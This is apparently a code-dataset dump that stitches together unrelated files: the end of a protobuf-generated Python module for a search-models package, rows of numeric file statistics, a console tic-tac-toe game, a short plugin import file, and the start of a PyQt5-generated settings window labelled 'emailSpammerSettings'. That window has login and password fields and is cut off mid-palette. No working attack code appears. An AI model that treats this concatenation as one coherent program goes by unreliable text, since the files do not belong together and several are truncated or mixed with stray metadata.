].containing_oneof = _QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"]
_QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"].fields.append(
_QUERY_CONSTRAINTEXPR.fields_by_name["constraint"]
)
_QUERY_CONSTRAINTEXPR.fields_by_name[
"constraint"
].containing_oneof = _QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"]
_QUERY_MODEL.fields_by_name["constraints"].message_type = _QUERY_CONSTRAINTEXPR
_QUERY_MODEL.fields_by_name["model"].message_type = _QUERY_DATAMODEL
_QUERY_MODEL.containing_type = _QUERY
DESCRIPTOR.message_types_by_name["Query"] = _QUERY
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Query = _reflection.GeneratedProtocolMessageType(
"Query",
(_message.Message,),
{
"Attribute": _reflection.GeneratedProtocolMessageType(
"Attribute",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_ATTRIBUTE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Attribute)
},
),
"DataModel": _reflection.GeneratedProtocolMessageType(
"DataModel",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_DATAMODEL,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.DataModel)
},
),
"Location": _reflection.GeneratedProtocolMessageType(
"Location",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_LOCATION,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Location)
},
),
"Value": _reflection.GeneratedProtocolMessageType(
"Value",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_VALUE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Value)
},
),
"KeyValue": _reflection.GeneratedProtocolMessageType(
"KeyValue",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_KEYVALUE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.KeyValue)
},
),
"Instance": _reflection.GeneratedProtocolMessageType(
"Instance",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_INSTANCE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Instance)
},
),
"StringPair": _reflection.GeneratedProtocolMessageType(
"StringPair",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_STRINGPAIR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.StringPair)
},
),
"IntPair": _reflection.GeneratedProtocolMessageType(
"IntPair",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_INTPAIR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.IntPair)
},
),
"DoublePair": _reflection.GeneratedProtocolMessageType(
"DoublePair",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_DOUBLEPAIR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.DoublePair)
},
),
"LocationPair": _reflection.GeneratedProtocolMessageType(
"LocationPair",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_LOCATIONPAIR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.LocationPair)
},
),
"Range": _reflection.GeneratedProtocolMessageType(
"Range",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_RANGE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Range)
},
),
"Distance": _reflection.GeneratedProtocolMessageType(
"Distance",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_DISTANCE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Distance)
},
),
"Relation": _reflection.GeneratedProtocolMessageType(
"Relation",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_RELATION,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Relation)
},
),
"Set": _reflection.GeneratedProtocolMessageType(
"Set",
(_message.Message,),
{
"Values": _reflection.GeneratedProtocolMessageType(
"Values",
(_message.Message,),
{
"Ints": _reflection.GeneratedProtocolMessageType(
"Ints",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_SET_VALUES_INTS,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values.Ints)
},
),
"Doubles": _reflection.GeneratedProtocolMessageType(
"Doubles",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_SET_VALUES_DOUBLES,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values.Doubles)
},
),
"Strings": _reflection.GeneratedProtocolMessageType(
"Strings",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_SET_VALUES_STRINGS,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values.Strings)
},
),
"Bools": _reflection.GeneratedProtocolMessageType(
"Bools",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_SET_VALUES_BOOLS,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values.Bools)
},
),
"Locations": _reflection.GeneratedProtocolMessageType(
"Locations",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_SET_VALUES_LOCATIONS,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values.Locations)
},
),
"DESCRIPTOR": _QUERY_SET_VALUES,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values)
},
),
"DESCRIPTOR": _QUERY_SET,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set)
},
),
"ConstraintExpr": _reflection.GeneratedProtocolMessageType(
"ConstraintExpr",
(_message.Message,),
{
"Or": _reflection.GeneratedProtocolMessageType(
"Or",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_CONSTRAINTEXPR_OR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.ConstraintExpr.Or)
},
),
"And": _reflection.GeneratedProtocolMessageType(
"And",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_CONSTRAINTEXPR_AND,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.ConstraintExpr.And)
},
),
"Not": _reflection.GeneratedProtocolMessageType(
"Not",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_CONSTRAINTEXPR_NOT,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.ConstraintExpr.Not)
},
),
"Constraint": _reflection.GeneratedProtocolMessageType(
"Constraint",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_CONSTRAINTEXPR_CONSTRAINT,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.ConstraintExpr.Constraint)
},
),
"DESCRIPTOR": _QUERY_CONSTRAINTEXPR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.ConstraintExpr)
},
),
"Model": _reflection.GeneratedProtocolMessageType(
"Model",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_MODEL,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Model)
},
),
"DESCRIPTOR": _QUERY,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query)
},
)
_sym_db.RegisterMessage(Query)
_sym_db.RegisterMessage(Query.Attribute)
_sym_db.RegisterMessage(Query.DataModel)
_sym_db.RegisterMessage(Query.Location)
_sym_db.RegisterMessage(Query.Value)
_sym_db.RegisterMessage(Query.KeyValue)
_sym_db.RegisterMessage(Query.Instance)
_sym_db.RegisterMessage(Query.StringPair)
_sym_db.RegisterMessage(Query.IntPair)
_sym_db.RegisterMessage(Query.DoublePair)
_sym_db.RegisterMessage(Query.LocationPair)
_sym_db.RegisterMessage(Query.Range)
_sym_db.RegisterMessage(Query.Distance)
_sym_db.RegisterMessage(Query.Relation)
_sym_db.RegisterMessage(Query.Set)
_sym_db.RegisterMessage(Query.Set.Values)
_sym_db.RegisterMessage(Query.Set.Values.Ints)
_sym_db.RegisterMessage(Query.Set.Values.Doubles)
_sym_db.RegisterMessage(Query.Set.Values.Strings)
_sym_db.RegisterMessage(Query.Set.Values.Bools)
_sym_db.RegisterMessage(Query.Set.Values.Locations)
_sym_db.RegisterMessage(Query.ConstraintExpr)
_sym_db.RegisterMessage(Query.ConstraintExpr.Or)
_sym_db.RegisterMessage(Query.ConstraintExpr.And)
_sym_db.RegisterMessage(Query.ConstraintExpr.Not)
_sym_db.RegisterMessage(Query.ConstraintExpr.Constraint)
_sym_db.RegisterMessage(Query.Model)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 33.935059 | 5,427 | 0.603765 | 7,952 | 77,338 | 5.552943 | 0.045649 | 0.041307 | 0.068845 | 0.079217 | 0.814933 | 0.780828 | 0.74987 | 0.700002 | 0.661413 | 0.633082 | 0 | 0.034518 | 0.290142 | 77,338 | 2,278 | 5,428 | 33.949956 | 0.769814 | 0.030929 | 0 | 0.723356 | 1 | 0.000454 | 0.174362 | 0.133248 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.001814 | 0 | 0.001814 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
af0b8753cc2dc846b006253716342a5cb4d2fedf | 5,804 | py | Python | tic tac toe.py | Arrangonsalves/Tic-Tac-Toe | 10aa15de21b92ec540aa9601365164ae27311a37 | [
"MIT"
] | null | null | null | tic tac toe.py | Arrangonsalves/Tic-Tac-Toe | 10aa15de21b92ec540aa9601365164ae27311a37 | [
"MIT"
] | null | null | null | tic tac toe.py | Arrangonsalves/Tic-Tac-Toe | 10aa15de21b92ec540aa9601365164ae27311a37 | [
"MIT"
] | null | null | null | l = ['-'] * 9
flag = 0


def des():
    """Draw the 3x3 board: each cell shows its mark and its position number."""
    for row in range(3):
        print(' ', '-' * 22)
        print(' ', '|      ' * 3 + '|')
        print(' ', '|  %s   |  %s   |  %s   |' % tuple(l[3 * row:3 * row + 3]))
        print(' ', '|  %d   |  %d   |  %d   |' % (3 * row + 1, 3 * row + 2, 3 * row + 3))
        print(' ', '|      ' * 3 + '|')
    print(' ', '-' * 22)


# Every winning line on the board: three rows, three columns, two diagonals.
WIN_LINES = ((0, 1, 2), (3, 4, 5), (6, 7, 8),
             (0, 3, 6), (1, 4, 7), (2, 5, 8),
             (0, 4, 8), (2, 4, 6))


def win():
    """Announce the winner and set flag to 1 if either player owns a full line."""
    global flag
    for a, b, c in WIN_LINES:
        if l[a] != '-' and l[a] == l[b] == l[c]:
            print('Player one wins' if l[a] == 'X' else 'Player two wins')
            flag = 1
            return


des()
for p in range(1, 10):
    # X moves on odd turns, O on even turns.
    if p % 2 == 0:
        mark, player = 'O', 'Player 2'
    else:
        mark, player = 'X', 'Player 1'
    print(player, 'turn')
    x = int(input('Enter the position '))
    if 1 <= x <= 9 and l[x - 1] == '-':
        l[x - 1] = mark
        win()
        if flag == 1:
            break
    else:
        print('Space is occupied, therefore your chance is skipped')
        continue
    des()

if flag == 1:
    des()
else:
    print('The game is a draw')
| 31.372973 | 85 | 0.276361 | 669 | 5,804 | 2.397608 | 0.076233 | 0.124688 | 0.082918 | 0.112219 | 0.90399 | 0.879676 | 0.874688 | 0.844763 | 0.834788 | 0.743142 | 0 | 0.05746 | 0.48725 | 5,804 | 184 | 86 | 31.543478 | 0.481519 | 0 | 0 | 0.722222 | 0 | 0 | 0.197792 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011111 | false | 0 | 0.005556 | 0 | 0.016667 | 0.216667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
af5365fa2eb2fb9697412fe92432a020578a62a1 | 104 | py | Python | howcani/plugins/__init__.py | rahuldshetty/howcani | 974e129c6edd97a0c234e6c2f1c4c084fecd8584 | [
"MIT"
] | null | null | null | howcani/plugins/__init__.py | rahuldshetty/howcani | 974e129c6edd97a0c234e6c2f1c4c084fecd8584 | [
"MIT"
] | null | null | null | howcani/plugins/__init__.py | rahuldshetty/howcani | 974e129c6edd97a0c234e6c2f1c4c084fecd8584 | [
"MIT"
] | null | null | null | from howcani.plugins.Plugin import Plugin
from howcani.plugins.stackoverflow import StackOverflowPlugin | 34.666667 | 61 | 0.884615 | 12 | 104 | 7.666667 | 0.583333 | 0.23913 | 0.391304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 104 | 3 | 61 | 34.666667 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
af8bd2c6158d048a6b436f172fa4359ae186a75f | 19,243 | py | Python | emailSpammerSettings.py | ohgodmanyo/Email-Spammer-V2 | 47d2b449043528aae6fc0d130186c33688c1e7c5 | [
"Apache-2.0"
] | null | null | null | emailSpammerSettings.py | ohgodmanyo/Email-Spammer-V2 | 47d2b449043528aae6fc0d130186c33688c1e7c5 | [
"Apache-2.0"
] | null | null | null | emailSpammerSettings.py | ohgodmanyo/Email-Spammer-V2 | 47d2b449043528aae6fc0d130186c33688c1e7c5 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'emailSpammerSettings.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
import json
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(469, 348)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(9, 9, 9))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(9, 9, 9))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(9, 9, 9))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(9, 9, 9))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
MainWindow.setPalette(palette)
self.centralwidget = QtWidgets.QWidget(MainWindow)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(20, 20, 20))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(20, 20, 20))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(20, 20, 20))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(20, 20, 20))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
self.centralwidget.setPalette(palette)
self.centralwidget.setObjectName("centralwidget")
self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit.setGeometry(QtCore.QRect(110, 80, 241, 20))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.lineEdit.setPalette(palette)
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
self.lineEdit.setFont(font)
self.lineEdit.setText("")
self.lineEdit.setObjectName("lineEdit")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(10, 10, 441, 71))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(207, 207, 207))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(200, 200, 200))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(31, 31, 31, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(207, 207, 207))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(200, 200, 200))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(31, 31, 31, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(31, 31, 31, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.label.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Rockwell")
font.setPointSize(30)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(10, 323, 291, 20))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(227, 227, 227))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(227, 227, 227))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
self.label_2.setPalette(palette)
self.label_2.setObjectName("label_2")
self.lineEdit_2 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_2.setGeometry(QtCore.QRect(110, 110, 241, 20))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.lineEdit_2.setPalette(palette)
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
self.lineEdit_2.setFont(font)
self.lineEdit_2.setText("")
self.lineEdit_2.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEdit_2.setObjectName("lineEdit_2")
self.checkBox = QtWidgets.QCheckBox(self.centralwidget)
self.checkBox.stateChanged.connect(self.clickBox)
self.checkBox.setGeometry(QtCore.QRect(360, 110, 70, 17))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(221, 221, 221))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 213, 213))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(188, 188, 188))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 213, 213, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(221, 221, 221))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 213, 213))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(188, 188, 188))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 213, 213, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.checkBox.setPalette(palette)
self.checkBox.setObjectName("checkBox")
self.lineEdit_3 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_3.setGeometry(QtCore.QRect(110, 140, 241, 20))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.lineEdit_3.setPalette(palette)
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
self.lineEdit_3.setFont(font)
self.lineEdit_3.setText("")
self.lineEdit_3.setObjectName("lineEdit_3")
self.lineEdit_4 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_4.setGeometry(QtCore.QRect(110, 170, 241, 20))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
